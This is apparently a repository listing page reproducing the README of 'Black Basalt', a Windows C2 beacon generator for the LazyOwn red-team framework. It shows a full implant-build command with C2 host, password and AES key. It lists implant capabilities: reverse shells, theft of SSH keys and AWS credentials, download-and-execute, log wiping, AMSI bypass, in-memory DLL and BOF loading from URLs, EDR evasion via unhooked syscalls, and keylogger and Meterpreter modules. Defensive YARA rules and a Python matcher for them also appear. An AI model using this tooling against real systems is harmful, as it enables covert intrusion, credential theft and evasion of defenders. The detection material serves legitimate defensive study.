
Beacon

Experimental lightweight Windows beacon in pure C, codename BlackBasalt, for the LazyOwn RedTeam Framework C2

Install / Use

/learn @grisuno/Beacon
About this skill

Quality Score: 0/100
Supported Platforms: Universal

README

🔥 === Black Basalt Beacon-GEN v0.2.1 ===

<img width="1664" height="928" alt="image" src="https://github.com/user-attachments/assets/e76ce510-dad2-4c6c-9910-c245ff71c9f4" />

🔍 INFO

  • GitHub Repository: https://github.com/grisuno/beacon
  • License: GNU General Public License v3.0 (GPLv3)
  • Author: grisun0
  • Target Platform: Windows (x64)
  • Source Platform: GNU/Linux 6.12 (tested on Kali)
  • Purpose: Academic research and red teaming exercises

⚠️ This project is released under GPLv3. See the DISCLAIMER section for full legal terms.

<img width="1712" height="859" alt="image" src="https://github.com/user-attachments/assets/74a13d86-3d7e-4207-a4bd-4231df9e3ea0" />

🔍 Overview

beacon-GEN is a next-generation Bash-based configuration engine designed to generate highly customizable, stealthy C2 beacons for offensive operations. Built as the core orchestration layer of the LazyOwn RedTeam framework, it enables red teams to dynamically configure malleable C2 profiles, AES-256 encrypted communication, multi-UA rotation, and client-side persistence logic — all through a clean, CLI-driven interface.

This script generates the foundational configuration for advanced implants that use APC injection and anti-analysis routines to evade modern EDR solutions.

Intended for ethical hacking, penetration testing, and academic research, this tool supports seamless integration into automated attack chains and red team infrastructure.

<img width="735" height="994" alt="image" src="https://github.com/user-attachments/assets/2cecaa04-2720-4e7f-9a7a-42e77f14f700" />

For RedTeamers

./gen_beacon.sh \
  --target 192.168.1.50 \
  --url https://c2.ejemplo.com:8443 \
  --maleable /api/v2/submit \
  --client-id win10-pro \
  --c2-host 192.168.1.10 \
  --c2-user AdminC2 \
  --c2-pass "P@ssw0rd_Secret_2025" \
  --c2-port 8443 \
  --aes-key aabbccddeeff00112233445566778899aabbccddeeff00112233445566778899 \
  --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" \
  --user-agent1 "Chrome/120.0.0.0 Safari/537.36" \
  --user-agent2 "CustomAgent/1.0 (compatible)" \
  --user-agent3 "BotNet-X/2.5" \
  --output hellbird.exe
<img width="1438" height="921" alt="image" src="https://github.com/user-attachments/assets/3a724561-230f-462a-bcc4-50bf7da76012" />

For BlueTeamers

rule beacon_GEN_Config_Template {
    meta:
        author = "LazyOwn BlueTeam"
        description = "Detects beacon-GEN generated C2 configuration"
        license = "GPLv3"

    strings:
        $c2_url_macro = "C2_URL \"$URL\"" ascii wide
        $maleable_macro = "MALEABLE \"$MALEABLE\"" ascii wide
        $client_id_macro = "CLIENT_ID \"$CLIENT_ID\"" ascii wide
        $aes_key_64char = /[0-9a-f]{64}/   // no 'wide' modifier: matches single-byte hex only
        $winhttp_init = "WinHttpOpen(" ascii wide
        $user_agent_var = "TRAFFIC_UAS[]" ascii wide
        // YARA refuses to compile a rule that declares a string its condition never
        // references, so every string listed here must be used in the condition below.

    condition:
        all of ($c2_url_macro, $maleable_macro, $client_id_macro) and
        $aes_key_64char and $winhttp_init and $user_agent_var
}
rule hellbird_Runtime_Behavior {
    meta:
        author = "LazyOwn BlueTeam"
        description = "Detects runtime behavior of HELLBIRD beacon"
        reference = "https://github.com/grisuno/hellbird"

    strings:
        $nt_queue_apc = "NtQueueApcThread" ascii wide
        // push 4 (CREATE_SUSPENDED) followed by push 0: a 32-bit stack-argument sequence.
        // x64 code passes the creation flags in a register, so this pattern does not fire
        // on 64-bit builds and the remaining strings carry the rule there.
        $create_suspended = { 6A 04 6A 00 6A 00 6A 00 6A 00 6A 00 }
        $aes_decrypt = "AES_ECB_encrypt" ascii wide
        // "\\\\" is two literal backslashes in YARA, i.e. the escaped form seen in C source;
        // a compiled binary stores single backslashes, which "\\" would match instead.
        $registry_persistence = "Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run" ascii wide
        $http_post_enc = "POST /" ascii wide
        $base64_decode = "base64_decode" ascii wide

    condition:
        $nt_queue_apc and $create_suspended and $aes_decrypt and
        ($registry_persistence or $http_post_enc) and $base64_decode
}
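As an added illustration for defenders (not code from the beacon-GEN project), the following Python reimplements the string matching and the condition of the beacon_GEN_Config_Template rule above without the yara module, including the UTF-16LE ("wide") forms, and evaluates it over two constructed samples.

```python
import re

# Indicator strings of the beacon_GEN_Config_Template rule above, reimplemented in
# Python (added example, not project code; does not need the yara module).
ASCII_WIDE_STRINGS = {
    "c2_url_macro": 'C2_URL "$URL"',
    "maleable_macro": 'MALEABLE "$MALEABLE"',
    "client_id_macro": 'CLIENT_ID "$CLIENT_ID"',
    "winhttp_init": "WinHttpOpen(",
    "user_agent_var": "TRAFFIC_UAS[]",
}
# The rule's /[0-9a-f]{64}/ has no 'wide' modifier, so it matches single-byte hex only.
AES_KEY_RE = re.compile(rb"[0-9a-f]{64}")

def string_hits(data: bytes) -> dict:
    """YARA 'ascii wide' semantics: a string hits if its ASCII or its UTF-16LE form occurs."""
    hits = {name: (text.encode("ascii") in data or text.encode("utf-16-le") in data)
            for name, text in ASCII_WIDE_STRINGS.items()}
    hits["aes_key_64char"] = AES_KEY_RE.search(data) is not None
    return hits

def matches_config_template(data: bytes) -> bool:
    """The rule condition: all three macros, the 64-hex key, WinHttpOpen( and TRAFFIC_UAS[]."""
    h = string_hits(data)
    return all(h[k] for k in ("c2_url_macro", "maleable_macro", "client_id_macro",
                              "aes_key_64char", "winhttp_init", "user_agent_var"))

# Constructed sample resembling a generated beacon source file (not a real artifact);
# the key is the placeholder value from the gen_beacon.sh example above.
KEY_HEX = b"aabbccddeeff00112233445566778899aabbccddeeff00112233445566778899"
SAMPLE_SOURCE = b"".join([
    b'#define C2_URL "$URL"\n',
    b'#define MALEABLE "$MALEABLE"\n',
    b'#define CLIENT_ID "$CLIENT_ID"\n',
    b'static const char *TRAFFIC_UAS[] = {"Mozilla/5.0"};\n',
    b'static const char KEY[] = "' + KEY_HEX + b'";\n',
    b'hSession = WinHttpOpen(L"Mozilla/5.0", 0, NULL, NULL, 0);\n',
])
# Constructed sample with the indicators as UTF-16LE (how a wide-string build stores
# them); the key stays ASCII because the regex would not match its wide form.
SAMPLE_WIDE = ('C2_URL "$URL" MALEABLE "$MALEABLE" CLIENT_ID "$CLIENT_ID" '
               'TRAFFIC_UAS[] WinHttpOpen(').encode("utf-16-le") + KEY_HEX

if __name__ == "__main__":
    for label, sample in (("source", SAMPLE_SOURCE), ("wide", SAMPLE_WIDE)):
        print(label, matches_config_template(sample))
```

A buffer in which everything, the hex key included, is UTF-16 fails the rule, because only the text strings carry the wide modifier.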


Available beacon commands:

  • stealth_off: Disables stealth mode ("stop being stealthy"), allowing normal operations.
  • stealth_on: Enables stealth mode ("ninja mode"), minimizing activity to avoid detection.
  • download:[filename]: Downloads a file from the C2 to the compromised host.
  • upload:[filename]: Uploads a file from the compromised host to the C2.
  • rev: Establishes a reverse shell to the C2 using the configured port.
  • exfil: Exfiltrates sensitive data (e.g., SSH keys, AWS credentials, command histories).
  • download_exec:[url]: Downloads and executes a binary from a URL (Linux only, stored in /dev/shm).
  • obfuscate:[filename]: Obfuscates file timestamps to hinder forensic analysis.
  • cleanlogs: Clears system logs (e.g., /var/log/syslog on Linux, event logs on Windows).
  • discover: Performs network discovery, identifying live hosts via ping.
  • adversary:[id_atomic]: Executes an adversary emulation test (MITRE ATT&CK) using downloaded Atomic Red Team scripts.
  • softenum: Enumerates useful software on the host (e.g., docker, nc, python).
  • netconfig: Captures and exfiltrates network configuration (e.g., ipconfig on Windows, ifconfig on Linux).
  • escalatelin: Attempts privilege escalation on Linux (e.g., via sudo -n or SUID binaries).
  • proxy:[listenip]:[listenport]:[targetip]:[targetport]: Starts a TCP proxy redirecting traffic from listenAddr to targetAddr.
  • stop_proxy:[listenaddr]: Stops a TCP proxy on the specified address.
  • portscan: Scans ports on discovered hosts and the configured rhost.
  • compressdir:[directory]: Compresses a directory into a .tar.gz file and exfiltrates it.
  • sandbox: Reports whether the system appears to be a sandbox.
  • isvm: Reports whether the system appears to be a virtual machine.
  • debug: Reports whether the implant is being debugged.
  • persist: Attempts to set up a persistence mechanism on the target system.
  • simulate: Simulates browsing a legitimate web page such as YouTube.
  • migrate: Injects a payload into a suspended process and resumes it. If no payload is specified, the current process is injected (self-migration).
  • shellcode: Downloads and executes shellcode in memory. Supports multiple operating systems and msfvenom-friendly formats (on Windows the technique used is Early Bird APC injection).
  • amsi: Bypasses AMSI (Anti-Malware Scan Interface) on Windows systems to evade detection by PowerShell, WMI, and other scripting engines.
  • load_module: Loads a DLL in memory from a URL on Windows systems to evade detection.
  • bof: Loads a COFF BOF object file in memory from a URL on Windows systems to evade detection (COFFLoader3, inspired by COFFLoader (https://github.com/trustedsec/COFFLoader/) and CoffeeLdr), in the style of Cobalt Strike.
  • hook: Reports which syscalls are hooked by AV/EDR/other products. By using direct, unhooked syscalls, as demonstrated in functions like CreateFileA_Unhooked and WriteProcessMemory_Unhooked and implemented via manually resolved NTAPI stubs such as g_pNtCreateFileUnhooked, g_pNtWriteVirtualMemoryUnhooked, g_pNtProtectVirtualMemoryUnhooked, g_pNtResumeThreadUnhooked, and g_pNtCreateThreadExUnhooked, it is possible to invoke low-level Windows API functionality while bypassing the user-mode hooks commonly placed by security products. This technique is highly evasive against traditional AV and modern EDR solutions, as it avoids instrumented or hooked Win32 API layers entirely and operates directly at the NT syscall boundary, a level where many security tools lack visibility or choose not to monitor because of performance overhead and complexity.
  • terminate: Terminates the implant or beacon, removing files and persistence mechanisms.

🔥 Modules

This beacon has a load_module command to which you pass the URL of a DLL module. For now there are 5 modules: reverse shell, Metasploit Meterpreter, keylogger, stealth command and screenshot.

<img width="1025" height="893" alt="image" src="https://github.com/user-attachments/assets/74e70f1d-4908-4483-af30-860a60c9bbd7" />
  • Reverse Shell : gen_dll_rev.sh
  • Metasploit Meterpreter: gen_dll.sh
  • Screenshot: gen_dll_ss.sh
  • Keylogger: gen_key.sh
  • Stealth Command: gen_module.sh
<img width="1697" height="516" alt="image" src="https://github.com/user-attachments/assets/14c62e2a-321d-4996-b2c0-98a165499f1e" />

🚀 Feature: bof: — Execute COFF BOF Objects In-Memory (Cobalt Strike Style)

<img width="1328" height="1328" alt="image" src="https://github.com/user-attachments/assets/22e3d203-764e-4c7f-8f74-83797c4440fd" />

Evade EDR/AV detection by loading and executing position-independent BOF (Binary Object File) payloads directly from a remote URL — without touching disk, without LoadLibrary, and without traditional PE loaders.

This feature is inspired by, but goes beyond, industry-standard tools like TrustedSec's COFFLoader and CoffeeLdr. It is engineered for stealth, reliability, and deep Windows internals compliance.

<img width="1710" height="602" alt="image" src="https://github.com/user-attachments/assets/99a5a560-8926-4743-af7c-99b46ef9129e" />

🎯 How It Works — The Engineering Breakdown

  1. Command Syntax: bof:http://your-c2.com/payload.x64.o [optional_args]
  • Downloads the raw .o (COFF) file over HTTP(S).
  • Parses the COFF structure in-memory.
  • Maps sections (.text, .rdata, .pdata, etc.) into PAGE_EXECUTE_READWRITE regions.
  • Applies x64 relocations (ADDR64, REL32, REL32_1-5, etc.) with trampoline generation for out-of-range jumps.
  • Resolves external symbols (e.g., BeaconPrintf, GetModuleHandleA, CoInitializeEx) via a precomputed DJB2 hash table.
  • Executes the target function (usually go) with aligned stack and proper calling convention (ms_abi).
<img width="768" height="992" alt="image" src="https://github.com/user-attachments/assets/a1732ce6-2910-4ae4-9c68-9aea15a70d38" />
View on GitHub: https://github.com/grisuno/beacon
GitHub Stars: 10
Category: Development
Updated: 1mo ago
Forks: 1

Languages: C

Security Score: 95/100

Audited on Jan 27, 2026: No findings